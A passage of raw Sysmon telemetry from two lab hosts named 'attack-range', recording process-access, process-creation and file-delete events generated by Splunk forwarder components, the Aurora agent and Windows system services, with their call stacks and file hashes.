Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.102{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E485-63C7-2A06-00000000AF02}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.102{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E485-63C7-2A06-00000000AF02}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000042093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:30.010{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A09B4D3E1AEFDBD1C3B4BC94C0F4DF0C,SHA256=B3CDDFB62543419863C6C4FE9F96EFCF7385C1A8A8548B74AF3D52C1C2C63C5B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016622Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.483{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E486-63C7-0502-00000000B002}360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016621Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.481{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016620Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.481{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016619Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.481{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016618Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.481{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016617Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.481{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016616Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.480{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016615Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.480{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016614Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.480{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016613Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.480{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016612Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.480{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E486-63C7-0502-00000000B002}360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016611Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.480{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E486-63C7-0502-00000000B002}360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016610Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.479{E5A8D418-E486-63C7-0502-00000000B002}360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016609Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.171{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF08D685D2152B667028F2C6769C8BB0,SHA256=5F37BD40E8FF2FFD41AF96AB50E1A81C5BB0EB7972EF3728895C3A9FC76FBFD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016608Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:30.046{E5A8D418-E485-63C7-0402-00000000B002}28802512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016639Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:31.848{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1324E6D68587C794AF290C9A95E2E24,SHA256=B1275A7BAAFE2D6B59F4AAC807E8FB06D4FE02618CD4002BE51A63ACF503B3D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.823{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000042134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:31.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program 